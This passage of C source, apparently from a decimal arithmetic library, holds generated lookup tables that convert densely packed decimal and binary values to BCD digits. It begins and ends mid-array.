'\3','8','1','2', '\3','8','1','3', '\3','8','1','4', '\3','8','1','5', '\3','8','1','6', '\3','8','1','7', '\3','8','1','8', '\3','8','1','9', '\3','8','2','0', '\3','8','2','1', '\3','8','2','2', '\3','8','2','3', '\3','8','2','4', '\3','8','2','5', '\3','8','2','6', '\3','8','2','7', '\3','8','2','8', '\3','8','2','9', '\3','8','3','0', '\3','8','3','1', '\3','8','3','2', '\3','8','3','3', '\3','8','3','4', '\3','8','3','5', '\3','8','3','6', '\3','8','3','7', '\3','8','3','8', '\3','8','3','9', '\3','8','4','0', '\3','8','4','1', '\3','8','4','2', '\3','8','4','3', '\3','8','4','4', '\3','8','4','5', '\3','8','4','6', '\3','8','4','7', '\3','8','4','8', '\3','8','4','9', 
'\3','8','5','0', '\3','8','5','1', '\3','8','5','2', '\3','8','5','3', '\3','8','5','4', '\3','8','5','5', '\3','8','5','6', '\3','8','5','7', '\3','8','5','8', '\3','8','5','9', '\3','8','6','0', '\3','8','6','1', '\3','8','6','2', '\3','8','6','3', '\3','8','6','4', '\3','8','6','5', '\3','8','6','6', '\3','8','6','7', '\3','8','6','8', '\3','8','6','9', '\3','8','7','0', '\3','8','7','1', '\3','8','7','2', '\3','8','7','3', '\3','8','7','4', '\3','8','7','5', '\3','8','7','6', '\3','8','7','7', '\3','8','7','8', '\3','8','7','9', '\3','8','8','0', '\3','8','8','1', '\3','8','8','2', '\3','8','8','3', '\3','8','8','4', '\3','8','8','5', '\3','8','8','6', '\3','8','8','7', '\3','8','8','8', '\3','8','8','9', '\3','8','9','0', '\3','8','9','1', '\3','8','9','2', '\3','8','9','3', '\3','8','9','4', '\3','8','9','5', '\3','8','9','6', '\3','8','9','7', '\3','8','9','8', '\3','8','9','9', '\3','9','0','0', '\3','9','0','1', '\3','9','0','2', '\3','9','0','3', '\3','9','0','4', '\3','9','0','5', '\3','9','0','6', '\3','9','0','7', '\3','9','0','8', '\3','9','0','9', '\3','9','1','0', '\3','9','1','1', '\3','9','1','2', '\3','9','1','3', '\3','9','1','4', '\3','9','1','5', '\3','9','1','6', '\3','9','1','7', '\3','9','1','8', '\3','9','1','9', '\3','9','2','0', '\3','9','2','1', '\3','9','2','2', '\3','9','2','3', '\3','9','2','4', '\3','9','2','5', '\3','9','2','6', '\3','9','2','7', '\3','9','2','8', '\3','9','2','9', '\3','9','3','0', '\3','9','3','1', '\3','9','3','2', '\3','9','3','3', '\3','9','3','4', '\3','9','3','5', '\3','9','3','6', '\3','9','3','7', '\3','9','3','8', '\3','9','3','9', '\3','9','4','0', '\3','9','4','1', '\3','9','4','2', '\3','9','4','3', '\3','9','4','4', '\3','9','4','5', '\3','9','4','6', '\3','9','4','7', '\3','9','4','8', '\3','9','4','9', '\3','9','5','0', '\3','9','5','1', '\3','9','5','2', '\3','9','5','3', '\3','9','5','4', '\3','9','5','5', '\3','9','5','6', '\3','9','5','7', '\3','9','5','8', '\3','9','5','9', '\3','9','6','0', '\3','9','6','1', '\3','9','6','2', '\3','9','6','3', '\3','9','6','4', '\3','9','6','5', '\3','9','6','6', '\3','9','6','7', '\3','9','6','8', '\3','9','6','9', '\3','9','7','0', '\3','9','7','1', '\3','9','7','2', '\3','9','7','3', '\3','9','7','4', '\3','9','7','5', '\3','9','7','6', '\3','9','7','7', '\3','9','7','8', '\3','9','7','9', '\3','9','8','0', '\3','9','8','1', '\3','9','8','2', '\3','9','8','3', '\3','9','8','4', '\3','9','8','5', '\3','9','8','6', '\3','9','8','7', '\3','9','8','8', '\3','9','8','9', '\3','9','9','0', '\3','9','9','1', '\3','9','9','2', '\3','9','9','3', '\3','9','9','4', '\3','9','9','5', '\3','9','9','6', '\3','9','9','7', '\3','9','9','8', '\3','9','9','9', '\0'}; #endif #if defined(DEC_DPD2BCD8) && DEC_DPD2BCD8==1 && !defined(DECDPD2BCD8) #define DECDPD2BCD8 const uint8_t DPD2BCD8[4096]={ 0,0,0,0, 0,0,1,1, 0,0,2,1, 0,0,3,1, 0,0,4,1, 0,0,5,1, 0,0,6,1, 0,0,7,1, 0,0,8,1, 0,0,9,1, 0,8,0,2, 0,8,1,2, 8,0,0,3, 8,0,1,3, 8,8,0,3, 8,8,1,3, 0,1,0,2, 0,1,1,2, 0,1,2,2, 0,1,3,2, 0,1,4,2, 0,1,5,2, 0,1,6,2, 0,1,7,2, 0,1,8,2, 0,1,9,2, 0,9,0,2, 0,9,1,2, 8,1,0,3, 8,1,1,3, 8,9,0,3, 8,9,1,3, 0,2,0,2, 0,2,1,2, 0,2,2,2, 0,2,3,2, 0,2,4,2, 0,2,5,2, 0,2,6,2, 0,2,7,2, 0,2,8,2, 0,2,9,2, 0,8,2,2, 0,8,3,2, 8,2,0,3, 8,2,1,3, 8,0,8,3, 8,0,9,3, 0,3,0,2, 0,3,1,2, 0,3,2,2, 0,3,3,2, 0,3,4,2, 0,3,5,2, 0,3,6,2, 0,3,7,2, 0,3,8,2, 0,3,9,2, 0,9,2,2, 0,9,3,2, 8,3,0,3, 8,3,1,3, 8,1,8,3, 8,1,9,3, 0,4,0,2, 0,4,1,2, 0,4,2,2, 0,4,3,2, 0,4,4,2, 0,4,5,2, 0,4,6,2, 0,4,7,2, 0,4,8,2, 0,4,9,2, 0,8,4,2, 0,8,5,2, 8,4,0,3, 8,4,1,3, 0,8,8,2, 0,8,9,2, 
0,5,0,2, 0,5,1,2, 0,5,2,2, 0,5,3,2, 0,5,4,2, 0,5,5,2, 0,5,6,2, 0,5,7,2, 0,5,8,2, 0,5,9,2, 0,9,4,2, 0,9,5,2, 8,5,0,3, 8,5,1,3, 0,9,8,2, 0,9,9,2, 0,6,0,2, 0,6,1,2, 0,6,2,2, 0,6,3,2, 0,6,4,2, 0,6,5,2, 0,6,6,2, 0,6,7,2, 0,6,8,2, 0,6,9,2, 0,8,6,2, 0,8,7,2, 8,6,0,3, 8,6,1,3, 8,8,8,3, 8,8,9,3, 0,7,0,2, 0,7,1,2, 0,7,2,2, 0,7,3,2, 0,7,4,2, 0,7,5,2, 0,7,6,2, 0,7,7,2, 0,7,8,2, 0,7,9,2, 0,9,6,2, 0,9,7,2, 8,7,0,3, 8,7,1,3, 8,9,8,3, 8,9,9,3, 1,0,0,3, 1,0,1,3, 1,0,2,3, 1,0,3,3, 1,0,4,3, 1,0,5,3, 1,0,6,3, 1,0,7,3, 1,0,8,3, 1,0,9,3, 1,8,0,3, 1,8,1,3, 9,0,0,3, 9,0,1,3, 9,8,0,3, 9,8,1,3, 1,1,0,3, 1,1,1,3, 1,1,2,3, 1,1,3,3, 1,1,4,3, 1,1,5,3, 1,1,6,3, 1,1,7,3, 1,1,8,3, 1,1,9,3, 1,9,0,3, 1,9,1,3, 9,1,0,3, 9,1,1,3, 9,9,0,3, 9,9,1,3, 1,2,0,3, 1,2,1,3, 1,2,2,3, 1,2,3,3, 1,2,4,3, 1,2,5,3, 1,2,6,3, 1,2,7,3, 1,2,8,3, 1,2,9,3, 1,8,2,3, 1,8,3,3, 9,2,0,3, 9,2,1,3, 9,0,8,3, 9,0,9,3, 1,3,0,3, 1,3,1,3, 1,3,2,3, 1,3,3,3, 1,3,4,3, 1,3,5,3, 1,3,6,3, 1,3,7,3, 1,3,8,3, 1,3,9,3, 1,9,2,3, 1,9,3,3, 9,3,0,3, 9,3,1,3, 9,1,8,3, 9,1,9,3, 1,4,0,3, 1,4,1,3, 1,4,2,3, 1,4,3,3, 1,4,4,3, 1,4,5,3, 1,4,6,3, 1,4,7,3, 1,4,8,3, 1,4,9,3, 1,8,4,3, 1,8,5,3, 9,4,0,3, 9,4,1,3, 1,8,8,3, 1,8,9,3, 1,5,0,3, 1,5,1,3, 1,5,2,3, 1,5,3,3, 1,5,4,3, 1,5,5,3, 1,5,6,3, 1,5,7,3, 1,5,8,3, 1,5,9,3, 1,9,4,3, 1,9,5,3, 9,5,0,3, 9,5,1,3, 1,9,8,3, 1,9,9,3, 1,6,0,3, 1,6,1,3, 1,6,2,3, 1,6,3,3, 1,6,4,3, 1,6,5,3, 1,6,6,3, 1,6,7,3, 1,6,8,3, 1,6,9,3, 1,8,6,3, 1,8,7,3, 9,6,0,3, 9,6,1,3, 9,8,8,3, 9,8,9,3, 1,7,0,3, 1,7,1,3, 1,7,2,3, 1,7,3,3, 1,7,4,3, 1,7,5,3, 1,7,6,3, 1,7,7,3, 1,7,8,3, 1,7,9,3, 1,9,6,3, 1,9,7,3, 9,7,0,3, 9,7,1,3, 9,9,8,3, 9,9,9,3, 2,0,0,3, 2,0,1,3, 2,0,2,3, 2,0,3,3, 2,0,4,3, 2,0,5,3, 2,0,6,3, 2,0,7,3, 2,0,8,3, 2,0,9,3, 2,8,0,3, 2,8,1,3, 8,0,2,3, 8,0,3,3, 8,8,2,3, 8,8,3,3, 2,1,0,3, 2,1,1,3, 2,1,2,3, 2,1,3,3, 2,1,4,3, 2,1,5,3, 2,1,6,3, 2,1,7,3, 2,1,8,3, 2,1,9,3, 2,9,0,3, 2,9,1,3, 8,1,2,3, 8,1,3,3, 8,9,2,3, 8,9,3,3, 2,2,0,3, 2,2,1,3, 2,2,2,3, 2,2,3,3, 2,2,4,3, 2,2,5,3, 2,2,6,3, 2,2,7,3, 2,2,8,3, 2,2,9,3, 2,8,2,3, 2,8,3,3, 8,2,2,3, 8,2,3,3, 8,2,8,3, 8,2,9,3, 2,3,0,3, 2,3,1,3, 2,3,2,3, 2,3,3,3, 2,3,4,3, 2,3,5,3, 2,3,6,3, 2,3,7,3, 2,3,8,3, 2,3,9,3, 2,9,2,3, 2,9,3,3, 8,3,2,3, 8,3,3,3, 8,3,8,3, 8,3,9,3, 2,4,0,3, 2,4,1,3, 2,4,2,3, 2,4,3,3, 2,4,4,3, 2,4,5,3, 2,4,6,3, 2,4,7,3, 2,4,8,3, 2,4,9,3, 2,8,4,3, 2,8,5,3, 8,4,2,3, 8,4,3,3, 2,8,8,3, 2,8,9,3, 2,5,0,3, 2,5,1,3, 2,5,2,3, 2,5,3,3, 2,5,4,3, 2,5,5,3, 2,5,6,3, 2,5,7,3, 2,5,8,3, 2,5,9,3, 2,9,4,3, 2,9,5,3, 8,5,2,3, 8,5,3,3, 2,9,8,3, 2,9,9,3, 2,6,0,3, 2,6,1,3, 2,6,2,3, 2,6,3,3, 2,6,4,3, 2,6,5,3, 2,6,6,3, 2,6,7,3, 2,6,8,3, 2,6,9,3, 2,8,6,3, 2,8,7,3, 8,6,2,3, 8,6,3,3, 8,8,8,3, 8,8,9,3, 2,7,0,3, 2,7,1,3, 2,7,2,3, 2,7,3,3, 2,7,4,3, 2,7,5,3, 2,7,6,3, 2,7,7,3, 2,7,8,3, 2,7,9,3, 2,9,6,3, 2,9,7,3, 8,7,2,3, 8,7,3,3, 8,9,8,3, 8,9,9,3, 3,0,0,3, 3,0,1,3, 3,0,2,3, 3,0,3,3, 3,0,4,3, 3,0,5,3, 3,0,6,3, 3,0,7,3, 3,0,8,3, 3,0,9,3, 3,8,0,3, 3,8,1,3, 9,0,2,3, 9,0,3,3, 9,8,2,3, 9,8,3,3, 3,1,0,3, 3,1,1,3, 3,1,2,3, 3,1,3,3, 3,1,4,3, 3,1,5,3, 3,1,6,3, 3,1,7,3, 3,1,8,3, 3,1,9,3, 3,9,0,3, 3,9,1,3, 9,1,2,3, 9,1,3,3, 9,9,2,3, 9,9,3,3, 3,2,0,3, 3,2,1,3, 3,2,2,3, 3,2,3,3, 3,2,4,3, 3,2,5,3, 3,2,6,3, 3,2,7,3, 3,2,8,3, 3,2,9,3, 3,8,2,3, 3,8,3,3, 9,2,2,3, 9,2,3,3, 9,2,8,3, 9,2,9,3, 3,3,0,3, 3,3,1,3, 3,3,2,3, 3,3,3,3, 3,3,4,3, 3,3,5,3, 3,3,6,3, 3,3,7,3, 3,3,8,3, 3,3,9,3, 3,9,2,3, 3,9,3,3, 9,3,2,3, 9,3,3,3, 9,3,8,3, 9,3,9,3, 3,4,0,3, 3,4,1,3, 3,4,2,3, 3,4,3,3, 3,4,4,3, 3,4,5,3, 3,4,6,3, 3,4,7,3, 3,4,8,3, 3,4,9,3, 3,8,4,3, 3,8,5,3, 9,4,2,3, 9,4,3,3, 3,8,8,3, 3,8,9,3, 3,5,0,3, 3,5,1,3, 3,5,2,3, 3,5,3,3, 3,5,4,3, 3,5,5,3, 3,5,6,3, 3,5,7,3, 3,5,8,3, 3,5,9,3, 3,9,4,3, 
3,9,5,3, 9,5,2,3, 9,5,3,3, 3,9,8,3, 3,9,9,3, 3,6,0,3, 3,6,1,3, 3,6,2,3, 3,6,3,3, 3,6,4,3, 3,6,5,3, 3,6,6,3, 3,6,7,3, 3,6,8,3, 3,6,9,3, 3,8,6,3, 3,8,7,3, 9,6,2,3, 9,6,3,3, 9,8,8,3, 9,8,9,3, 3,7,0,3, 3,7,1,3, 3,7,2,3, 3,7,3,3, 3,7,4,3, 3,7,5,3, 3,7,6,3, 3,7,7,3, 3,7,8,3, 3,7,9,3, 3,9,6,3, 3,9,7,3, 9,7,2,3, 9,7,3,3, 9,9,8,3, 9,9,9,3, 4,0,0,3, 4,0,1,3, 4,0,2,3, 4,0,3,3, 4,0,4,3, 4,0,5,3, 4,0,6,3, 4,0,7,3, 4,0,8,3, 4,0,9,3, 4,8,0,3, 4,8,1,3, 8,0,4,3, 8,0,5,3, 8,8,4,3, 8,8,5,3, 4,1,0,3, 4,1,1,3, 4,1,2,3, 4,1,3,3, 4,1,4,3, 4,1,5,3, 4,1,6,3, 4,1,7,3, 4,1,8,3, 4,1,9,3, 4,9,0,3, 4,9,1,3, 8,1,4,3, 8,1,5,3, 8,9,4,3, 8,9,5,3, 4,2,0,3, 4,2,1,3, 4,2,2,3, 4,2,3,3, 4,2,4,3, 4,2,5,3, 4,2,6,3, 4,2,7,3, 4,2,8,3, 4,2,9,3, 4,8,2,3, 4,8,3,3, 8,2,4,3, 8,2,5,3, 8,4,8,3, 8,4,9,3, 4,3,0,3, 4,3,1,3, 4,3,2,3, 4,3,3,3, 4,3,4,3, 4,3,5,3, 4,3,6,3, 4,3,7,3, 4,3,8,3, 4,3,9,3, 4,9,2,3, 4,9,3,3, 8,3,4,3, 8,3,5,3, 8,5,8,3, 8,5,9,3, 4,4,0,3, 4,4,1,3, 4,4,2,3, 4,4,3,3, 4,4,4,3, 4,4,5,3, 4,4,6,3, 4,4,7,3, 4,4,8,3, 4,4,9,3, 4,8,4,3, 4,8,5,3, 8,4,4,3, 8,4,5,3, 4,8,8,3, 4,8,9,3, 4,5,0,3, 4,5,1,3, 4,5,2,3, 4,5,3,3, 4,5,4,3, 4,5,5,3, 4,5,6,3, 4,5,7,3, 4,5,8,3, 4,5,9,3, 4,9,4,3, 4,9,5,3, 8,5,4,3, 8,5,5,3, 4,9,8,3, 4,9,9,3, 4,6,0,3, 4,6,1,3, 4,6,2,3, 4,6,3,3, 4,6,4,3, 4,6,5,3, 4,6,6,3, 4,6,7,3, 4,6,8,3, 4,6,9,3, 4,8,6,3, 4,8,7,3, 8,6,4,3, 8,6,5,3, 8,8,8,3, 8,8,9,3, 4,7,0,3, 4,7,1,3, 4,7,2,3, 4,7,3,3, 4,7,4,3, 4,7,5,3, 4,7,6,3, 4,7,7,3, 4,7,8,3, 4,7,9,3, 4,9,6,3, 4,9,7,3, 8,7,4,3, 8,7,5,3, 8,9,8,3, 8,9,9,3, 5,0,0,3, 5,0,1,3, 5,0,2,3, 5,0,3,3, 5,0,4,3, 5,0,5,3, 5,0,6,3, 5,0,7,3, 5,0,8,3, 5,0,9,3, 5,8,0,3, 5,8,1,3, 9,0,4,3, 9,0,5,3, 9,8,4,3, 9,8,5,3, 5,1,0,3, 5,1,1,3, 5,1,2,3, 5,1,3,3, 5,1,4,3, 5,1,5,3, 5,1,6,3, 5,1,7,3, 5,1,8,3, 5,1,9,3, 5,9,0,3, 5,9,1,3, 9,1,4,3, 9,1,5,3, 9,9,4,3, 9,9,5,3, 5,2,0,3, 5,2,1,3, 5,2,2,3, 5,2,3,3, 5,2,4,3, 5,2,5,3, 5,2,6,3, 5,2,7,3, 5,2,8,3, 5,2,9,3, 5,8,2,3, 5,8,3,3, 9,2,4,3, 9,2,5,3, 9,4,8,3, 9,4,9,3, 5,3,0,3, 5,3,1,3, 5,3,2,3, 5,3,3,3, 5,3,4,3, 5,3,5,3, 5,3,6,3, 5,3,7,3, 5,3,8,3, 5,3,9,3, 5,9,2,3, 5,9,3,3, 9,3,4,3, 9,3,5,3, 9,5,8,3, 9,5,9,3, 5,4,0,3, 5,4,1,3, 5,4,2,3, 5,4,3,3, 5,4,4,3, 5,4,5,3, 5,4,6,3, 5,4,7,3, 5,4,8,3, 5,4,9,3, 5,8,4,3, 5,8,5,3, 9,4,4,3, 9,4,5,3, 5,8,8,3, 5,8,9,3, 5,5,0,3, 5,5,1,3, 5,5,2,3, 5,5,3,3, 5,5,4,3, 5,5,5,3, 5,5,6,3, 5,5,7,3, 5,5,8,3, 5,5,9,3, 5,9,4,3, 5,9,5,3, 9,5,4,3, 9,5,5,3, 5,9,8,3, 5,9,9,3, 5,6,0,3, 5,6,1,3, 5,6,2,3, 5,6,3,3, 5,6,4,3, 5,6,5,3, 5,6,6,3, 5,6,7,3, 5,6,8,3, 5,6,9,3, 5,8,6,3, 5,8,7,3, 9,6,4,3, 9,6,5,3, 9,8,8,3, 9,8,9,3, 5,7,0,3, 5,7,1,3, 5,7,2,3, 5,7,3,3, 5,7,4,3, 5,7,5,3, 5,7,6,3, 5,7,7,3, 5,7,8,3, 5,7,9,3, 5,9,6,3, 5,9,7,3, 9,7,4,3, 9,7,5,3, 9,9,8,3, 9,9,9,3, 6,0,0,3, 6,0,1,3, 6,0,2,3, 6,0,3,3, 6,0,4,3, 6,0,5,3, 6,0,6,3, 6,0,7,3, 6,0,8,3, 6,0,9,3, 6,8,0,3, 6,8,1,3, 8,0,6,3, 8,0,7,3, 8,8,6,3, 8,8,7,3, 6,1,0,3, 6,1,1,3, 6,1,2,3, 6,1,3,3, 6,1,4,3, 6,1,5,3, 6,1,6,3, 6,1,7,3, 6,1,8,3, 6,1,9,3, 6,9,0,3, 6,9,1,3, 8,1,6,3, 8,1,7,3, 8,9,6,3, 8,9,7,3, 6,2,0,3, 6,2,1,3, 6,2,2,3, 6,2,3,3, 6,2,4,3, 6,2,5,3, 6,2,6,3, 6,2,7,3, 6,2,8,3, 6,2,9,3, 6,8,2,3, 6,8,3,3, 8,2,6,3, 8,2,7,3, 8,6,8,3, 8,6,9,3, 6,3,0,3, 6,3,1,3, 6,3,2,3, 6,3,3,3, 6,3,4,3, 6,3,5,3, 6,3,6,3, 6,3,7,3, 6,3,8,3, 6,3,9,3, 6,9,2,3, 6,9,3,3, 8,3,6,3, 8,3,7,3, 8,7,8,3, 8,7,9,3, 6,4,0,3, 6,4,1,3, 6,4,2,3, 6,4,3,3, 6,4,4,3, 6,4,5,3, 6,4,6,3, 6,4,7,3, 6,4,8,3, 6,4,9,3, 6,8,4,3, 6,8,5,3, 8,4,6,3, 8,4,7,3, 6,8,8,3, 6,8,9,3, 6,5,0,3, 6,5,1,3, 6,5,2,3, 6,5,3,3, 6,5,4,3, 6,5,5,3, 6,5,6,3, 6,5,7,3, 6,5,8,3, 6,5,9,3, 6,9,4,3, 6,9,5,3, 8,5,6,3, 8,5,7,3, 6,9,8,3, 6,9,9,3, 6,6,0,3, 6,6,1,3, 6,6,2,3, 6,6,3,3, 6,6,4,3, 6,6,5,3, 
6,6,6,3, 6,6,7,3, 6,6,8,3, 6,6,9,3, 6,8,6,3, 6,8,7,3, 8,6,6,3, 8,6,7,3, 8,8,8,3, 8,8,9,3, 6,7,0,3, 6,7,1,3, 6,7,2,3, 6,7,3,3, 6,7,4,3, 6,7,5,3, 6,7,6,3, 6,7,7,3, 6,7,8,3, 6,7,9,3, 6,9,6,3, 6,9,7,3, 8,7,6,3, 8,7,7,3, 8,9,8,3, 8,9,9,3, 7,0,0,3, 7,0,1,3, 7,0,2,3, 7,0,3,3, 7,0,4,3, 7,0,5,3, 7,0,6,3, 7,0,7,3, 7,0,8,3, 7,0,9,3, 7,8,0,3, 7,8,1,3, 9,0,6,3, 9,0,7,3, 9,8,6,3, 9,8,7,3, 7,1,0,3, 7,1,1,3, 7,1,2,3, 7,1,3,3, 7,1,4,3, 7,1,5,3, 7,1,6,3, 7,1,7,3, 7,1,8,3, 7,1,9,3, 7,9,0,3, 7,9,1,3, 9,1,6,3, 9,1,7,3, 9,9,6,3, 9,9,7,3, 7,2,0,3, 7,2,1,3, 7,2,2,3, 7,2,3,3, 7,2,4,3, 7,2,5,3, 7,2,6,3, 7,2,7,3, 7,2,8,3, 7,2,9,3, 7,8,2,3, 7,8,3,3, 9,2,6,3, 9,2,7,3, 9,6,8,3, 9,6,9,3, 7,3,0,3, 7,3,1,3, 7,3,2,3, 7,3,3,3, 7,3,4,3, 7,3,5,3, 7,3,6,3, 7,3,7,3, 7,3,8,3, 7,3,9,3, 7,9,2,3, 7,9,3,3, 9,3,6,3, 9,3,7,3, 9,7,8,3, 9,7,9,3, 7,4,0,3, 7,4,1,3, 7,4,2,3, 7,4,3,3, 7,4,4,3, 7,4,5,3, 7,4,6,3, 7,4,7,3, 7,4,8,3, 7,4,9,3, 7,8,4,3, 7,8,5,3, 9,4,6,3, 9,4,7,3, 7,8,8,3, 7,8,9,3, 7,5,0,3, 7,5,1,3, 7,5,2,3, 7,5,3,3, 7,5,4,3, 7,5,5,3, 7,5,6,3, 7,5,7,3, 7,5,8,3, 7,5,9,3, 7,9,4,3, 7,9,5,3, 9,5,6,3, 9,5,7,3, 7,9,8,3, 7,9,9,3, 7,6,0,3, 7,6,1,3, 7,6,2,3, 7,6,3,3, 7,6,4,3, 7,6,5,3, 7,6,6,3, 7,6,7,3, 7,6,8,3, 7,6,9,3, 7,8,6,3, 7,8,7,3, 9,6,6,3, 9,6,7,3, 9,8,8,3, 9,8,9,3, 7,7,0,3, 7,7,1,3, 7,7,2,3, 7,7,3,3, 7,7,4,3, 7,7,5,3, 7,7,6,3, 7,7,7,3, 7,7,8,3, 7,7,9,3, 7,9,6,3, 7,9,7,3, 9,7,6,3, 9,7,7,3, 9,9,8,3, 9,9,9,3}; #endif #if defined(DEC_BIN2BCD8) && DEC_BIN2BCD8==1 && !defined(DECBIN2BCD8) #define DECBIN2BCD8 const uint8_t BIN2BCD8[4000]={ 0,0,0,0, 0,0,1,1, 0,0,2,1, 0,0,3,1, 0,0,4,1, 0,0,5,1, 0,0,6,1, 0,0,7,1, 0,0,8,1, 0,0,9,1, 0,1,0,2, 0,1,1,2, 0,1,2,2, 0,1,3,2, 0,1,4,2, 0,1,5,2, 0,1,6,2, 0,1,7,2, 0,1,8,2, 0,1,9,2, 0,2,0,2, 0,2,1,2, 0,2,2,2, 0,2,3,2, 0,2,4,2, 0,2,5,2, 0,2,6,2, 0,2,7,2, 0,2,8,2, 0,2,9,2, 0,3,0,2, 0,3,1,2, 0,3,2,2, 0,3,3,2, 0,3,4,2, 0,3,5,2, 0,3,6,2, 0,3,7,2, 0,3,8,2, 0,3,9,2, 0,4,0,2, 0,4,1,2, 0,4,2,2, 0,4,3,2, 0,4,4,2, 0,4,5,2, 0,4,6,2, 0,4,7,2, 0,4,8,2, 0,4,9,2, 0,5,0,2, 0,5,1,2, 0,5,2,2, 0,5,3,2, 0,5,4,2, 0,5,5,2, 0,5,6,2, 0,5,7,2, 0,5,8,2, 0,5,9,2, 0,6,0,2, 0,6,1,2, 0,6,2,2, 0,6,3,2, 0,6,4,2, 0,6,5,2, 0,6,6,2, 0,6,7,2, 0,6,8,2, 0,6,9,2, 0,7,0,2, 0,7,1,2, 0,7,2,2, 0,7,3,2, 0,7,4,2, 0,7,5,2, 0,7,6,2, 0,7,7,2, 0,7,8,2, 0,7,9,2, 0,8,0,2, 0,8,1,2, 0,8,2,2, 0,8,3,2, 0,8,4,2, 0,8,5,2, 0,8,6,2, 0,8,7,2, 0,8,8,2, 0,8,9,2, 0,9,0,2, 0,9,1,2, 0,9,2,2, 0,9,3,2, 0,9,4,2, 0,9,5,2, 0,9,6,2, 0,9,7,2, 0,9,8,2, 0,9,9,2, 1,0,0,3, 1,0,1,3, 1,0,2,3, 1,0,3,3, 1,0,4,3, 1,0,5,3, 1,0,6,3, 1,0,7,3, 1,0,8,3, 1,0,9,3, 1,1,0,3, 1,1,1,3, 1,1,2,3, 1,1,3,3, 1,1,4,3, 1,1,5,3, 1,1,6,3, 1,1,7,3, 1,1,8,3, 1,1,9,3, 1,2,0,3, 1,2,1,3, 1,2,2,3, 1,2,3,3, 1,2,4,3, 1,2,5,3, 1,2,6,3, 1,2,7,3, 1,2,8,3, 1,2,9,3, 1,3,0,3, 1,3,1,3, 1,3,2,3, 1,3,3,3, 1,3,4,3, 1,3,5,3, 1,3,6,3, 1,3,7,3, 1,3,8,3, 1,3,9,3, 1,4,0,3, 1,4,1,3, 1,4,2,3, 1,4,3,3, 1,4,4,3, 1,4,5,3, 1,4,6,3, 1,4,7,3, 1,4,8,3, 1,4,9,3, 1,5,0,3, 1,5,1,3, 1,5,2,3, 1,5,3,3, 1,5,4,3, 1,5,5,3, 1,5,6,3, 1,5,7,3, 1,5,8,3, 1,5,9,3, 1,6,0,3, 1,6,1,3, 1,6,2,3, 1,6,3,3, 1,6,4,3, 1,6,5,3, 1,6,6,3, 1,6,7,3, 1,6,8,3, 1,6,9,3, 1,7,0,3, 1,7,1,3, 1,7,2,3, 1,7,3,3, 1,7,4,3, 1,7,5,3, 1,7,6,3, 1,7,7,3, 1,7,8,3, 1,7,9,3, 1,8,0,3, 1,8,1,3, 1,8,2,3, 1,8,3,3, 1,8,4,3, 1,8,5,3, 1,8,6,3, 1,8,7,3, 1,8,8,3, 1,8,9,3, 1,9,0,3, 1,9,1,3, 1,9,2,3, 1,9,3,3, 1,9,4,3, 1,9,5,3, 1,9,6,3, 1,9,7,3, 1,9,8,3, 1,9,9,3, 2,0,0,3, 2,0,1,3, 2,0,2,3, 2,0,3,3, 2,0,4,3, 2,0,5,3, 2,0,6,3, 2,0,7,3, 2,0,8,3, 2,0,9,3, 2,1,0,3, 2,1,1,3, 2,1,2,3, 2,1,3,3, 2,1,4,3, 2,1,5,3, 2,1,6,3, 2,1,7,3, 2,1,8,3, 2,1,9,3, 2,2,0,3, 2,2,1,3, 2,2,2,3, 2,2,3,3, 2,2,4,3, 2,2,5,3, 
2,2,6,3, 2,2,7,3, 2,2,8,3, 2,2,9,3, 2,3,0,3, 2,3,1,3, 2,3,2,3, 2,3,3,3, 2,3,4,3, 2,3,5,3, 2,3,6,3, 2,3,7,3, 2,3,8,3, 2,3,9,3, 2,4,0,3, 2,4,1,3, 2,4,2,3, 2,4,3,3, 2,4,4,3, 2,4,5,3, 2,4,6,3, 2,4,7,3, 2,4,8,3, 2,4,9,3, 2,5,0,3, 2,5,1,3, 2,5,2,3, 2,5,3,3, 2,5,4,3, 2,5,5,3, 2,5,6,3, 2,5,7,3, 2,5,8,3, 2,5,9,3, 2,6,0,3, 2,6,1,3, 2,6,2,3, 2,6,3,3, 2,6,4,3, 2,6,5,3, 2,6,6,3, 2,6,7,3, 2,6,8,3, 2,6,9,3, 2,7,0,3, 2,7,1,3, 2,7,2,3, 2,7,3,3, 2,7,4,3, 2,7,5,3, 2,7,6,3, 2,7,7,3, 2,7,8,3, 2,7,9,3, 2,8,0,3, 2,8,1,3, 2,8,2,3, 2,8,3,3, 2,8,4,3, 2,8,5,3, 2,8,6,3, 2,8,7,3, 2,8,8,3, 2,8,9,3, 2,9,0,3, 2,9,1,3, 2,9,2,3, 2,9,3,3, 2,9,4,3, 2,9,5,3, 2,9,6,3, 2,9,7,3, 2,9,8,3, 2,9,9,3, 3,0,0,3, 3,0,1,3, 3,0,2,3, 3,0,3,3, 3,0,4,3, 3,0,5,3, 3,0,6,3, 3,0,7,3, 3,0,8,3, 3,0,9,3, 3,1,0,3, 3,1,1,3, 3,1,2,3, 3,1,3,3, 3,1,4,3, 3,1,5,3, 3,1,6,3, 3,1,7,3, 3,1,8,3, 3,1,9,3, 3,2,0,3, 3,2,1,3, 3,2,2,3, 3,2,3,3, 3,2,4,3, 3,2,5,3, 3,2,6,3, 3,2,7,3, 3,2,8,3, 3,2,9,3, 3,3,0,3, 3,3,1,3, 3,3,2,3, 3,3,3,3, 3,3,4,3, 3,3,5,3, 3,3,6,3, 3,3,7,3, 3,3,8,3, 3,3,9,3, 3,4,0,3, 3,4,1,3, 3,4,2,3, 3,4,3,3, 3,4,4,3, 3,4,5,3, 3,4,6,3, 3,4,7,3, 3,4,8,3, 3,4,9,3, 3,5,0,3, 3,5,1,3, 3,5,2,3, 3,5,3,3, 3,5,4,3, 3,5,5,3, 3,5,6,3, 3,5,7,3, 3,5,8,3, 3,5,9,3, 3,6,0,3, 3,6,1,3, 3,6,2,3, 3,6,3,3, 3,6,4,3, 3,6,5,3, 3,6,6,3, 3,6,7,3, 3,6,8,3, 3,6,9,3, 3,7,0,3, 3,7,1,3, 3,7,2,3, 3,7,3,3, 3,7,4,3, 3,7,5,3, 3,7,6,3, 3,7,7,3, 3,7,8,3, 3,7,9,3, 3,8,0,3, 3,8,1,3, 3,8,2,3, 3,8,3,3, 3,8,4,3, 3,8,5,3, 3,8,6,3, 3,8,7,3, 3,8,8,3, 3,8,9,3, 3,9,0,3, 3,9,1,3, 3,9,2,3, 3,9,3,3, 3,9,4,3, 3,9,5,3, 3,9,6,3, 3,9,7,3, 3,9,8,3, 3,9,9,3, 4,0,0,3, 4,0,1,3, 4,0,2,3, 4,0,3,3, 4,0,4,3, 4,0,5,3, 4,0,6,3, 4,0,7,3, 4,0,8,3, 4,0,9,3, 4,1,0,3, 4,1,1,3, 4,1,2,3, 